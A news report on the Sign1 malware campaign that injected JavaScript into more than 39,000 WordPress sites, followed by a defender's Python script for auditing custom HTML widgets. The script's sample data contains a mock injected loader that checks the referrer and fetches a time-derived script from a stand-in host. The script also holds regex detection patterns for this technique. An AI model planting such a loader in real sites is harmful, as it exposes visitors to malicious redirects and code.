A malware campaign has infected 39,000 WordPress sites. More details are below.
A new malware campaign, called Sign1, has been discovered to infect more than 39,000 websites in the past six months.
This campaign causes users to see unwanted redirects and popup ads when visiting an infected website.
The attackers behind this campaign inject the malware into custom HTML widgets and legitimate plugins on WordPress sites.
They do this by injecting malicious Sign1 scripts into these plugins rather than modifying the actual WordPress files.
Website security firm Sucuri identified the campaign after its client’s website displayed popup ads to visitors.
Although Sucuri’s client was breached due to a brute force attack, there is no information available on how other detected sites were compromised.
However, based on previous WordPress attacks, it is likely that the attackers used a combination of brute force attacks and exploitation of plugin vulnerabilities to gain access to the sites.
After gaining access, threat actors tend to use WordPress custom HTML widgets, or install the legitimate Simple Custom CSS and JS plugin, to inject malicious JavaScript code.
Sucuri’s analysis of Sign1 malware revealed that it employs time-based randomization to generate dynamic URLs that change every 10 minutes.
This method helps the malware evade blocks. The domains used in the attacks are registered shortly before they’re used to ensure that they’re not in any blocklists.
According to Bleeping Computer, these URLs are used to fetch further malicious scripts that are run in a visitor’s browser.
“Initially, the domains were hosted on Namecheap, but the attackers have now moved to HETZNER for hosting and Cloudflare for IP address obfuscation,” the publication notes.
The same online publication also revealed the following: “The malicious code checks for specific referrers and cookies before executing, targeting visitors from major sites like Google, Facebook, Yahoo, and Instagram and remaining dormant in other cases.”
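A defender's sketch of the injection pattern described above, as an added example that is not from Sucuri, Bleeping Computer or this article's author: it audits custom HTML widget content for a dynamically loaded script whose URL is time-derived and gated on referrer or cookie. The input shape (a JSON export of WordPress's `widget_custom_html` option), the indicator regexes and the sample widgets are assumptions constructed for illustration.

```python
import json
import re

# Heuristic indicators (assumptions for this example, not Sucuri's signatures).
INDICATORS = {
    "time_derived": re.compile(r"Date\.now\s*\(|new\s+Date\s*\(|\.getTime\s*\("),
    "dynamic_script": re.compile(r"createElement\s*\(\s*['\"]script['\"]|document\.write\s*\(", re.I),
    "referrer_check": re.compile(r"document\.referrer"),
    "cookie_check": re.compile(r"document\.cookie"),
}

def indicators(content):
    """Return the set of indicator names found in one widget's HTML."""
    return {name for name, rx in INDICATORS.items() if rx.search(content)}

def is_suspicious(found):
    # Flag only the combination the article describes: a script loaded
    # from a time-derived URL, gated on referrer or cookie.
    gated = bool(found & {"referrer_check", "cookie_check"})
    return {"time_derived", "dynamic_script"} <= found and gated

def audit_widgets(option_json):
    """option_json: JSON text of the widget_custom_html option (assumed shape)."""
    flagged = {}
    for key, widget in json.loads(option_json).items():
        if not isinstance(widget, dict):  # skips the "_multiwidget" marker
            continue
        found = indicators(widget.get("content", ""))
        if is_suspicious(found):
            flagged[key] = sorted(found)
    return flagged

# Constructed sample data (not captured from a real site).
SAMPLE = json.dumps({
    "2": {"title": "Clock", "content": "<script>document.title = new Date().toString();</script>"},
    "3": {"title": "", "content": (
        "<script>if (document.referrer.indexOf('google') > -1) {"
        "var t = Math.floor(Date.now() / 600000);"
        "var s = document.createElement('script');"
        "s.src = 'https://example.invalid/' + t + '.js';"
        "document.head.appendChild(s);}</script>")},
    "4": {"title": "Chat", "content": "<script>var s=document.createElement('script');"
          "s.src='https://example.invalid/chat.js';document.head.appendChild(s);</script>"},
    "_multiwidget": 1,
})

if __name__ == "__main__":
    for key, found in audit_widgets(SAMPLE).items():
        print(f"widget {key}: {', '.join(found)}")
```

Requiring all three signals together keeps ordinary clock or chat embeds from being flagged; a hit is a prompt for manual review of that widget, not proof of infection.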